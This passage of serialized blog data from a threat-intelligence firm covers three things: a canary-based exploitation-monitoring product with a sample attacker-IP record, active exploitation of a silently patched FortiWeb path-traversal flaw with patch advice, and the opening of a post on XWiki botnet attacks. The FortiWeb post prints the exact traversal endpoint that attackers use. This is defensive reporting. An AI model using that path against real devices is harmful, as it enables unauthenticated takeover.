class":1375,"line":16187},[1373,29314,26357],{"class":9152},[1373,29316,29317],{"class":9155},"reported_exploited_by_vulncheck_canaries",[1373,29319,183],{"class":9152},[1373,29321,4606],{"class":1383},[1373,29323,14986],{"class":7054},[1373,29325,9062],{"class":1383},[1373,29327,29328,29330,29332,29334,29336,29338,29340,29342],{"class":1375,"line":16198},[1373,29329,26357],{"class":9152},[1373,29331,12998],{"class":9155},[1373,29333,183],{"class":9152},[1373,29335,4606],{"class":1383},[1373,29337,4883],{"class":9173},[1373,29339,28905],{"class":9176},[1373,29341,183],{"class":9173},[1373,29343,9062],{"class":1383},[1373,29345,29346,29348,29350,29352,29354,29356,29359],{"class":1375,"line":16204},[1373,29347,26357],{"class":9152},[1373,29349,26501],{"class":9155},[1373,29351,183],{"class":9152},[1373,29353,4606],{"class":1383},[1373,29355,4883],{"class":9173},[1373,29357,29358],{"class":9176},"2025-11-03T13:27:52.697389321Z",[1373,29360,19057],{"class":9173},[1373,29362,29363],{"class":1375,"line":16210},[1373,29364,4795],{"class":1383},[1373,29366,29367],{"class":1375,"line":16254},[1373,29368,29369],{"class":4640}," ]\n",[1373,29371,29372],{"class":1375,"line":18499},[1373,29373,1855],{"class":4640},[18,29375,29376],{},"Also an additional event has been added to the VulnCheck Console’s CVE timeline labeled “First Canary Exploitation.” This gives all community users visibility into real exploitation as soon as it’s observed.",[18,29378,29379],{},[68,29380],{"alt":29381,"src":29382},"cve-2025-2611.png","\u002Fcve-2025-2611.png",[993,29384,24853],{"id":29385},"vulncheck-exploit-vulnerability-intelligence",[18,29387,29388],{},"VulnCheck Exploit & Vulnerability Intelligence customers will now see Canary data integrated into vulncheck-nvd, vulncheck-nvd2, and exploits indices. Each exploit record includes Canary observation links and the new boolean field “reported_exploited_by_vulncheck_canaries”, allowing users to instantly filter and prioritize CVEs that have been verified through real exploitation.",[993,29390,29392],{"id":29391},"vulncheck-ip-intelligence","VulnCheck IP Intelligence",[18,29394,29395,29396,29399],{},"Canary data is also incorporated into ",[47,29397,29392],{"href":1249,"rel":29398},[51],". IPs associated with exploitation observed by Canaries are included alongside the corresponding CVE, attacker country, and first-seen timestamp. For example:",[1354,29401,29403],{"className":22307,"code":29402,"language":22309,"meta":219,"style":219},"{\n \"ip\": \"159.65.227.190\",\n \"port\": 38761,\n \"ssl\": false,\n \"lastSeen\": \"2025-11-01T12:03:20.969Z\",\n \"asn\": \"AS14061\",\n \"country\": \"United States\",\n \"country_code\": \"US\",\n \"city\": \"North Bergen\",\n \"cve\": [\n \"CVE-2025-2611\"\n ],\n \"matches\": [\n \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\"\n ],\n \"hostnames\": [],\n \"type\": {\n \"id\": \"vulncheck-canaries\",\n \"kind\": \"\",\n \"finding\": \"Web Application Attack\"\n },\n \"feed_ids\": [\n \"1319334194617328\"\n ],\n \"_timestamp\": \"2025-11-01T12:03:20.969Z\"\n },\n",[886,29404,29405,29409,29427,29441,29455,29473,29492,29510,29528,29547,29559,29567,29571,29583,29591,29595,29607,29619,29638,29652,29668,29672,29684,29693,29697,29713],{"__ignoreMap":219},[1373,29406,29407],{"class":1375,"line":1376},[1373,29408,8904],{"class":1383},[1373,29410,29411,29413,29415,29417,29419,29421,29423,29425],{"class":1375,"line":220},[1373,29412,26357],{"class":9152},[1373,29414,26184],{"class":9155},[1373,29416,183],{"class":9152},[1373,29418,4606],{"class":1383},[1373,29420,4883],{"class":9173},[1373,29422,28241],{"class":9176},[1373,29424,183],{"class":9173},[1373,29426,9062],{"class":1383},[1373,29428,29429,29431,29433,29435,29437,29439],{"class":1375,"line":1266},[1373,29430,26357],{"class":9152},[1373,29432,26203],{"class":9155},[1373,29434,183],{"class":9152},[1373,29436,4606],{"class":1383},[1373,29438,28258],{"class":5467},[1373,29440,9062],{"class":1383},[1373,29442,29443,29445,29447,29449,29451,29453],{"class":1375,"line":1852},[1373,29444,26357],{"class":9152},[1373,29446,26219],{"class":9155},[1373,29448,183],{"class":9152},[1373,29450,4606],{"class":1383},[1373,29452,16311],{"class":7054},[1373,29454,9062],{"class":1383},[1373,29456,29457,29459,29461,29463,29465,29467,29469,29471],{"class":1375,"line":4692},[1373,29458,26357],{"class":9152},[1373,29460,26234],{"class":9155},[1373,29462,183],{"class":9152},[1373,29464,4606],{"class":1383},[1373,29466,4883],{"class":9173},[1373,29468,28483],{"class":9176},[1373,29470,183],{"class":9173},[1373,29472,9062],{"class":1383},[1373,29474,29475,29477,29479,29481,29483,29485,29488,29490],{"class":1375,"line":4724},[1373,29476,26357],{"class":9152},[1373,29478,26254],{"class":9155},[1373,29480,183],{"class":9152},[1373,29482,4606],{"class":1383},[1373,29484,4883],{"class":9173},[1373,29486,29487],{"class":9176},"AS14061",[1373,29489,183],{"class":9173},[1373,29491,9062],{"class":1383},[1373,29493,29494,29496,29498,29500,29502,29504,29506,29508],{"class":1375,"line":4756},[1373,29495,26357],{"class":9152},[1373,29497,26274],{"class":9155},[1373,29499,183],{"class":9152},[1373,29501,4606],{"class":1383},[1373,29503,4883],{"class":9173},[1373,29505,1494],{"class":9176},[1373,29507,183],{"class":9173},[1373,29509,9062],{"class":1383},[1373,29511,29512,29514,29516,29518,29520,29522,29524,29526],{"class":1375,"line":4768},[1373,29513,26357],{"class":9152},[1373,29515,26293],{"class":9155},[1373,29517,183],{"class":9152},[1373,29519,4606],{"class":1383},[1373,29521,4883],{"class":9173},[1373,29523,23799],{"class":9176},[1373,29525,183],{"class":9173},[1373,29527,9062],{"class":1383},[1373,29529,29530,29532,29534,29536,29538,29540,29543,29545],{"class":1375,"line":4792},[1373,29531,26357],{"class":9152},[1373,29533,26312],{"class":9155},[1373,29535,183],{"class":9152},[1373,29537,4606],{"class":1383},[1373,29539,4883],{"class":9173},[1373,29541,29542],{"class":9176},"North Bergen",[1373,29544,183],{"class":9173},[1373,29546,9062],{"class":1383},[1373,29548,29549,29551,29553,29555,29557],{"class":1375,"line":4798},[1373,29550,26357],{"class":9152},[1373,29552,242],{"class":9155},[1373,29554,183],{"class":9152},[1373,29556,4606],{"class":1383},[1373,29558,26352],{"class":1383},[1373,29560,29561,29563,29565],{"class":1375,"line":4806},[1373,29562,28414],{"class":9173},[1373,29564,23717],{"class":9176},[1373,29566,19057],{"class":9173},[1373,29568,29569],{"class":1375,"line":4817},[1373,29570,28828],{"class":1383},[1373,29572,29573,29575,29577,29579,29581],{"class":1375,"line":4825},[1373,29574,26357],{"class":9152},[1373,29576,26345],{"class":9155},[1373,29578,183],{"class":9152},[1373,29580,4606],{"class":1383},[1373,29582,26352],{"class":1383},[1373,29584,29585,29587,29589],{"class":1375,"line":4835},[1373,29586,28414],{"class":9173},[1373,29588,23853],{"class":9176},[1373,29590,19057],{"class":9173},[1373,29592,29593],{"class":1375,"line":4843},[1373,29594,28828],{"class":1383},[1373,29596,29597,29599,29601,29603,29605],{"class":1375,"line":4849},[1373,29598,26357],{"class":9152},[1373,29600,26373],{"class":9155},[1373,29602,183],{"class":9152},[1373,29604,4606],{"class":1383},[1373,29606,26338],{"class":1383},[1373,29608,29609,29611,29613,29615,29617],{"class":1375,"line":4877},[1373,29610,26357],{"class":9152},[1373,29612,26399],{"class":9155},[1373,29614,183],{"class":9152},[1373,29616,4606],{"class":1383},[1373,29618,4765],{"class":1383},[1373,29620,29621,29623,29625,29627,29629,29631,29634,29636],{"class":1375,"line":4915},[1373,29622,28414],{"class":9152},[1373,29624,26412],{"class":9165},[1373,29626,183],{"class":9152},[1373,29628,4606],{"class":1383},[1373,29630,4883],{"class":9173},[1373,29632,29633],{"class":9176},"vulncheck-canaries",[1373,29635,183],{"class":9173},[1373,29637,9062],{"class":1383},[1373,29639,29640,29642,29644,29646,29648,29650],{"class":1375,"line":4931},[1373,29641,28414],{"class":9152},[1373,29643,26432],{"class":9165},[1373,29645,183],{"class":9152},[1373,29647,4606],{"class":1383},[1373,29649,16579],{"class":9173},[1373,29651,9062],{"class":1383},[1373,29653,29654,29656,29658,29660,29662,29664,29666],{"class":1375,"line":4947},[1373,29655,28414],{"class":9152},[1373,29657,26452],{"class":9165},[1373,29659,183],{"class":9152},[1373,29661,4606],{"class":1383},[1373,29663,4883],{"class":9173},[1373,29665,23873],{"class":9176},[1373,29667,19057],{"class":9173},[1373,29669,29670],{"class":1375,"line":4952},[1373,29671,28468],{"class":1383},[1373,29673,29674,29676,29678,29680,29682],{"class":1375,"line":6776},[1373,29675,26357],{"class":9152},[1373,29677,26475],{"class":9155},[1373,29679,183],{"class":9152},[1373,29681,4606],{"class":1383},[1373,29683,26352],{"class":1383},[1373,29685,29686,29688,29691],{"class":1375,"line":6781},[1373,29687,28414],{"class":9173},[1373,29689,29690],{"class":9176},"1319334194617328",[1373,29692,19057],{"class":9173},[1373,29694,29695],{"class":1375,"line":7524},[1373,29696,28828],{"class":1383},[1373,29698,29699,29701,29703,29705,29707,29709,29711],{"class":1375,"line":7530},[1373,29700,26357],{"class":9152},[1373,29702,26501],{"class":9155},[1373,29704,183],{"class":9152},[1373,29706,4606],{"class":1383},[1373,29708,4883],{"class":9173},[1373,29710,28483],{"class":9176},[1373,29712,19057],{"class":9173},[1373,29714,29715,29717],{"class":1375,"line":7546},[1373,29716,28032],{"class":1383},[1373,29718,9062],{"class":4640},[61,29720,1903],{"id":1902},[18,29722,29723],{},"VulnCheck Canary Intelligence gives defenders something they desperately need: verified, real-time visibility into active exploitation across the internet. It transforms exploitation from something discovered after the fact into something defenders can monitor as it happens. By integrating Canary data across VulnCheck products, customers gain:",[22,29725,29726,29729,29732,29735],{},[25,29727,29728],{},"Immediate awareness of CVEs being exploited in the wild",[25,29730,29731],{},"Earlier detection and prioritization of vulnerabilities that actually matter",[25,29733,29734],{},"Attribution insight linking attacker IPs, infrastructure, and payloads",[25,29736,29737],{},"Contextual enrichment across VulnCheck KEV, Exploit & Vulnerability Intelligence, and IP Intelligence datasets",[18,29739,29740],{},"Defenders can now act on ground-truth exploitation telemetry, not assumptions, not lab data, and not delayed reporting. VulnCheck Canary Intelligence turns live attacks into early warning.",[18,29742,29743,29744,29749],{},"Get started: create an account to request a Canary Intelligence trial, access real-world exploit listings now via the free VulnCheck KEV, or explore ongoing Canary exploitation trends on our ",[47,29745,29748],{"href":29746,"rel":29747},"https:\u002F\u002Fresearch.vulncheck.com\u002Fcanary-kev",[51],"VulnCheck Research"," site.",[18,29751,29752],{},[295,29753,202],{},[18,29755,29756,29757,1554,29761,59],{},"VulnCheck is the exploit intelligence company helping enterprise, global government organizations and cybersecurity vendors respond to new vulnerabilities and emerging threats faster with more context. Trusted by the world's largest organizations, VulnCheck protects hundreds of millions of systems and people worldwide, enabling them to outpace adversaries with threat intelligence solutions purpose-built for machine-level consumption and response actioning at scale. VulnCheck’s threat intelligence offerings equip teams with comprehensive, real-time exploit and vulnerability intelligence, first-party attack visibility and essential detections that are autonomously correlated and machine-readable, enabling emerging threat response in software vs human analysis. Follow the company on ",[47,29758,12204],{"href":29759,"rel":29760},"https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fvulncheck\u002F",[51],[47,29762,29765],{"href":29763,"rel":29764},"https:\u002F\u002Fx.com\u002Fvulncheckai",[51],"X",[2901,29767,29768],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":29770},[29771,29772,29773,29774,29779],{"id":28166,"depth":220,"text":19621},{"id":28175,"depth":220,"text":28176},{"id":28191,"depth":220,"text":28192},{"id":28659,"depth":220,"text":28660,"children":29775},[29776,29777,29778],{"id":28666,"depth":1266,"text":28667},{"id":29385,"depth":1266,"text":24853},{"id":29391,"depth":1266,"text":29392},{"id":1902,"depth":220,"text":1903},"2025-11-17","Introducing VulnCheck Canary Intelligence, a new offering that captures real-world exploitation as it happens.",{"slug":29783},"introducing-vulncheck-canary-intelligence","\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence",{"title":28149,"description":29781},"blog\u002Fintroducing-vulncheck-canary-intelligence",[2941,1281,1279],"zFI6qy6iL7VdyjpuawZz4KRP3Hf0DdmmLD_mmWZ3Fxk",{"id":29790,"title":19437,"articles":29791,"authors":29811,"body":29814,"date":29988,"description":29989,"extension":234,"image":7,"link":7,"meta":29990,"navigation":237,"path":29992,"seo":29993,"series":7,"stem":29994,"subtype":7,"tags":29995,"__hash__":29996},"blog\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability.md",[29792,29795,29798,29802,29806,29807],{"title":29793,"source":10841,"link":29794,"date":29780},"Critical vulnerability in Fortinet FortiWeb is under exploitation","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fcritical-vulnerability-in-fortinet-fortiweb-is-under-exploitation\u002F805688\u002F",{"title":29796,"source":11218,"link":29797,"date":29780},"Critical Fortinet FortiWeb WAF Bug Exploited in the Wild","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fcritical-fortinet-fortiweb-waf-bug-exploited-in-wild",{"title":29799,"source":3486,"link":29800,"date":29801},"Fortinet’s silent patch sparks alarm as a critical FortiWeb flaw is exploited in the wild","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4091939\u002Ffortinets-silent-patch-sparks-alarm-as-a-critical-fortiweb-flaw-is-exploited-in-the-wild.html","2025-11-18",{"title":29803,"source":29804,"link":29805,"date":29801},"Fortinet Silent Patch Raises Concern Among Security Researchers","The Cyber Express","https:\u002F\u002Fthecyberexpress.com\u002Ffortinet-silent-patch-raises-concern\u002F",{"title":29793,"source":10841,"link":29794,"date":28154},{"title":29808,"source":25685,"link":29809,"date":29810},"Cybersecurity News Weekly Newsletter – Fortinet, Chrome 0-Day Flaws, Cloudflare Outage and Salesforce Gainsight Breach","https:\u002F\u002Fcybersecuritynews.com\u002Fcybersecurity-news-weekly-newsletter-nov-2025\u002F","2025-11-23",[29812],{"name":256,"link":258,"avatar":257,"linkName":29813},"Caitlin Condon on LinkedIn",{"type":15,"value":29815,"toc":29983},[29816,29846,29857,29869,29876,29890,29894,29905,29922,29930,29934,29948,29950,29965],[18,29817,29818,29819,29824,29825,1246,29830,1255,29835,29840,29841,29845],{},"Over the last few days, ",[47,29820,29823],{"href":29821,"rel":29822},"https:\u002F\u002Fx.com\u002FDefusedCyber\u002Fstatus\u002F1975242250373517373",[51],"multiple"," security ",[47,29826,29829],{"href":29827,"rel":29828},"https:\u002F\u002Flabs.watchtowr.com\u002Fwhen-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass\u002F",[51],"companies",[47,29831,29834],{"href":29832,"rel":29833},"https:\u002F\u002Fx.com\u002FCERTCyberdef\u002Fstatus\u002F1989311517611733454",[51],"CERTs",[47,29836,29839],{"href":29837,"rel":29838},"https:\u002F\u002Fx.com\u002Fcyb3rops\u002Fstatus\u002F1988892219105845509",[51],"individuals"," have sounded alarms about active exploitation of a silently patched Fortinet FortiWeb vulnerability that is being leveraged to add new (administrative) users, enabling compromise of target devices. Fortinet has not published any information on why the vulnerability was silently patched and initially failed to receive a CVE or a security bulletin. The ",[47,29842,14853],{"href":29843,"rel":29844},"https:\u002F\u002Fdocs.fortinet.com\u002Fdocument\u002Ffortiweb\u002F8.0.2\u002Frelease-notes\u002F091537\u002Fresolved-issues",[51]," for the latest version of FortiWeb (8.0.2) make no mention of a related issue or fix.",[18,29847,29848,29851,29852,29856],{},[295,29849,29850],{},"Update:"," As of 11 AM ET on November 14, Fortinet has ",[47,29853,22232],{"href":29854,"rel":29855},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-25-910",[51]," an advisory and assigned CVE-2025-64446 to a path confusion vulnerability in the Fortiweb GUI.",[18,29858,29859,29860,29865,29866],{},"According to ",[47,29861,29864],{"href":29862,"rel":29863},"https:\u002F\u002Fwww.pwndefend.com\u002F2025\u002F11\u002F13\u002Fsuspected-fortinet-zero-day-exploited-in-the-wild\u002F",[51],"PwnDefend",", adversaries are executing payloads via POST requests to the following endpoint: ",[886,29867,29868],{},"\u002Fapi\u002Fv2.0\u002Fcmdb\u002Fsystem\u002Fadmin%3F\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fcgi-bin\u002Ffwbcgi",[18,29870,29871,29872,29875],{},"watchTowr has a write-up of the attack flow ",[47,29873,305],{"href":29827,"rel":29874},[51],", which looks to contain two discrete vulnerabilities rather than one.",[18,29877,29878,29879,29883,29884,29889],{},"ASM queries show varying volumes of FortiWeb exposed to the public internet, with Shodan ",[47,29880,26452],{"href":29881,"rel":29882},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.title%3A%22FortiWeb%22+-Server",[51]," a little under 300 instances (once honeypots have been filtered out) and FOFA ",[47,29885,29888],{"href":29886,"rel":29887},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IkZvcnRpV2ViIg%3D%3D",[51],"showing"," just shy of 2,700 internet-exposed instances.",[61,29891,29893],{"id":29892},"mitigation","Mitigation",[18,29895,29896,29897,29900,29901,29904],{},"Per Fortinet's ",[47,29898,5359],{"href":29854,"rel":29899},[51]," for CVE-2025-64446, the vulnerability is a relative path traversal issue ",[1373,29902,29903],{},"CWE-23"," that allows unauthenticated attackers to execute administrative commands on the system via crafted HTTP or HTTPS requests. The following FortiWeb versions are affected:",[22,29906,29907,29910,29913,29916,29919],{},[25,29908,29909],{},"8.0.0 through 8.0.1 (fixed in 8.0.2 or above)",[25,29911,29912],{},"7.6.0 through 7.6.4 (fixed in 7.6.5 or above)",[25,29914,29915],{},"7.4.0 through 7.4.9 (fixed in 7.4.10 or above)",[25,29917,29918],{},"7.2.0 through 7.2.11 (fixed in7.2.12 or above)",[25,29920,29921],{},"7.0.0 through 7.0.11 (fixed in 7.0.12 or above)",[18,29923,29924,29925,29929],{},"FortiWeb customers should update to a fixed version on an emergency basis, disabling HTTP or HTTPS for internet-facing FortiWeb interfaces until the update is complete. As always, patching does not eradicate prior compromise — organizations should examine their devices for signs of compromise, including any unsanctioned administrative or non-admin users. Since CVE-2025-64446 has been exploited in the wild for at least a month prior to public disclosure, organizations would be well-advised to invoke incident response playbooks. Shadowserver ",[47,29926,14466],{"href":29927,"rel":29928},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fiot-devices\u002Ftime-series\u002F?date_range=30&vendor=fortinet&model=fortiweb+management+interface&dataset=count&limit=100&group_by=geo&stacking=stacked&auto_update=on",[51]," several hundred management interfaces exposed to the internet.",[61,29931,29933],{"id":29932},"a-note-on-silent-patching","A Note on Silent Patching",[18,29935,29936,29937,29942,29943,29947],{},"We strongly suggest that FortiWeb customers reach out to the supplier for guidance on threat hunting and IOCs, as well as to request a formal response on why no CVE or advisory was issued when the vulnerability was first fixed. Silently patching vulnerabilities is an established bad practice that enables attackers and harms defenders, particularly for devices and systems (including FortiWeb) that have ",[47,29938,29941],{"href":29939,"rel":29940},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-25257",[51],"previously"," been ",[47,29944,970],{"href":29945,"rel":29946},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-52970",[51]," in the wild. We already know security by obscurity doesn't work; adversaries monitor new product releases and are actively reverse engineering patches regardless of whether suppliers tell their customers about fixed vulnerabilities or not. When popular technology vendors fail to communicate new security issues, they are issuing an invitation to attackers while choosing to keep that same information from defenders.",[61,29949,202],{"id":201},[18,29951,29952,29953,1246,29956,1255,29961,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and curate. For more research like this, see ",[47,29954,10801],{"href":10796,"rel":29955},[51],[47,29957,29960],{"href":29958,"rel":29959},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnovember-2025-research-highlights",[51],"VulnCheck Research Highlights: November 2025",[47,29962,29964],{"href":24024,"rel":29963},[51],"ICTBroadcast Command Injection Actively Exploited",[18,29966,1228,29967,1234,29970,1240,29973,1246,29976,29979,29980,1260],{},[47,29968,1233],{"href":10806,"rel":29969},[51],[47,29971,1239],{"href":1237,"rel":29972},[51],[47,29974,1245],{"href":1243,"rel":29975},[51],[47,29977,1251],{"href":1249,"rel":29978},[51],", and [Exploit & Vulnerability Intelligence](",[47,29981,1258],{"href":1258,"rel":29982},[51],{"title":219,"searchDepth":220,"depth":220,"links":29984},[29985,29986,29987],{"id":29892,"depth":220,"text":29893},{"id":29932,"depth":220,"text":29933},{"id":201,"depth":220,"text":202},"2025-11-14","A silently patched vulnerability (CVE-2025-64446) in Fortinet FortiWeb is being exploited in the wild to add administrative users and compromise target devices",{"slug":29991},"fortinet-fortiweb-exploitation-silent-patch","\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",{"title":19437,"description":29989},"blog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",[242,1281,1280],"O3svw3B6rOpvmQRTIgI4vO0F7GLIMcKpz6b6vAy7AgA",{"id":29998,"title":10801,"articles":29999,"authors":30030,"body":30032,"date":29988,"description":30383,"extension":234,"image":7,"link":7,"meta":30384,"navigation":237,"path":30386,"seo":30387,"series":7,"stem":30388,"subtype":7,"tags":30389,"__hash__":30390},"blog\u002Fblog\u002Fxwiki-under-increased-attack.md",[30000,30004,30007,30010,30013,30016,30019,30023,30026],{"title":30001,"source":14382,"link":30002,"date":30003},"RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet","https:\u002F\u002Fthehackernews.com\u002F2025\u002F11\u002Frondodox-exploits-unpatched-xwiki.html","2025-11-15",{"title":30005,"source":14378,"link":30006,"date":29780},"Widespread Exploitation of XWiki Vulnerability Observed","https:\u002F\u002Fwww.securityweek.com\u002Fwidespread-exploitation-of-xwiki-vulnerability-observed\u002Famp\u002F",{"title":30008,"source":25677,"link":30009,"date":29780},"Hackers Hiring Servers for Botnet by Exploiting XWiki Vulnerability in the Wild","https:\u002F\u002Fcyberpress.org\u002Fbotnet-by-exploiting-xwixi\u002F",{"title":30011,"source":25685,"link":30012,"date":29780},"Hackers Exploiting XWiki Vulnerability in the Wild to Hire the Servers for Botnet","https:\u002F\u002Fcybersecuritynews.com\u002Fxwiki-vulnerability-exploited-in-the-wild\u002F#google_vignette",{"title":30014,"source":25672,"link":30015,"date":29780},"Hackers Weaponize XWiki Flaw to Build and Rent Out Botnet Networks","https:\u002F\u002Fgbhackers.com\u002Fhackers-weaponize-xwiki-flaw\u002F",{"title":30017,"source":14390,"link":30018,"date":29780},"RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025","https:\u002F\u002Fsecurityaffairs.com\u002F184702\u002Fmalware\u002Frondodox-expands-botnet-by-exploiting-xwiki-rce-bug-left-unpatched-since-february-2025.html",{"title":30020,"source":30021,"link":30022,"date":29780},"Botnets, Miners, and Reverse Shells: XWiki CVE-2025-24893 Becomes a Playground for Attackers","Enterprise Security Tech","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Fbotnets-miners-and-reverse-shells-xwiki-cve-2025-24893-becomes-a-playground-for-attackers",{"title":30024,"source":12153,"link":30025,"date":29780},"XWiki bug actively exploited by multiple threat actors","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fxwiki-bug-actively-exploited-by-multiple-threat-actors",{"title":30027,"source":14373,"link":30028,"date":30029},"RondoDox botnet exploits React2Shell flaw to breach Next.js servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Frondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers\u002F","2025-12-31",[30031],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":30033,"toc":30376},[30034,30037,30057,30062,30067,30073,30077,30080,30100,30104,30108,30119,30123,30127,30135,30151,30155,30159,30178,30182,30186,30190,30193,30209,30213,30217,30249,30253,30257,30261,30268,30281,30285,30289,30306,30310,30314,30322,30326,30330,30332,30342,30344,30359],[263,30035],{":list":30036,"ico":266,"title":20},"[\"Since our initial publication, exploitation has expanded quickly. Multiple independent attackers are now actively targeting CVE-2025-24893.\",\"The actor set is diverse. We’re seeing everything from botnets and coin-miners to custom tooling and bespoke scanners.\",\"Defenders need time, and early detection is the only way to get it. VulnCheck Canaries provide that early visibility before exploitation becomes widespread.\"]",[18,30038,30039,30040,30045,30046,30051,30052,30056],{},"On October 28, we published ",[1131,30041,30042],{},[47,30043,19428],{"href":19426,"rel":30044},[51]," detailing an attacker abusing internet-exposed XWiki servers. Two days later, on October 30, ",[47,30047,30050],{"href":30048,"rel":30049},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-24893",[51],"CVE-2025-24893"," was added to ",[47,30053,30055],{"href":2864,"rel":30054},[51],"CISA Known Exploited Vulnerabilities"," (KEV). Since then, we’ve observed a noticeable uptick in exploit attempts.",[18,30058,30059],{},[295,30060,30061],{},"Canary Intelligence Observed CVE-2025-24893 Attacks (Oct. 28 - Nov. 11, 2025)",[30063,30064],"line-chart",{":labels":30065,":series":30066},"[\"2025-10-28\",\"2025-10-29\",\"2025-10-30\",\"2025-10-31\",\"2025-11-01\",\"2025-11-02\",\"2025-11-03\",\"2025-11-04\",\"2025-11-05\",\"2025-11-06\",\"2025-11-07\",\"2025-11-08\",\"2025-11-09\",\"2025-11-10\",\"2025-11-11\"]","[{\"type\":\"line\",\"name\":\"Attacks\",\"data\":[2,4,2,23,4,4,16,10,26,69,124,20,16,36,99]}]",[18,30068,10402,30069,30072],{},[47,30070,283],{"href":281,"rel":30071},[51]," shows not only an increase in scanning activity but also a clear expansion of active exploitation. In the following sections, we’ll share some of what we’re seeing.",[61,30074,30076],{"id":30075},"attacks-with-secondary-payload","Attacks with Secondary Payload",[18,30078,30079],{},"We saw a sharp uptick in attacks when the RondoDox botnet added this vulnerability to its repertoire. The first RondoDox exploit was observed on November 3, 2025, and activity has grown steadily 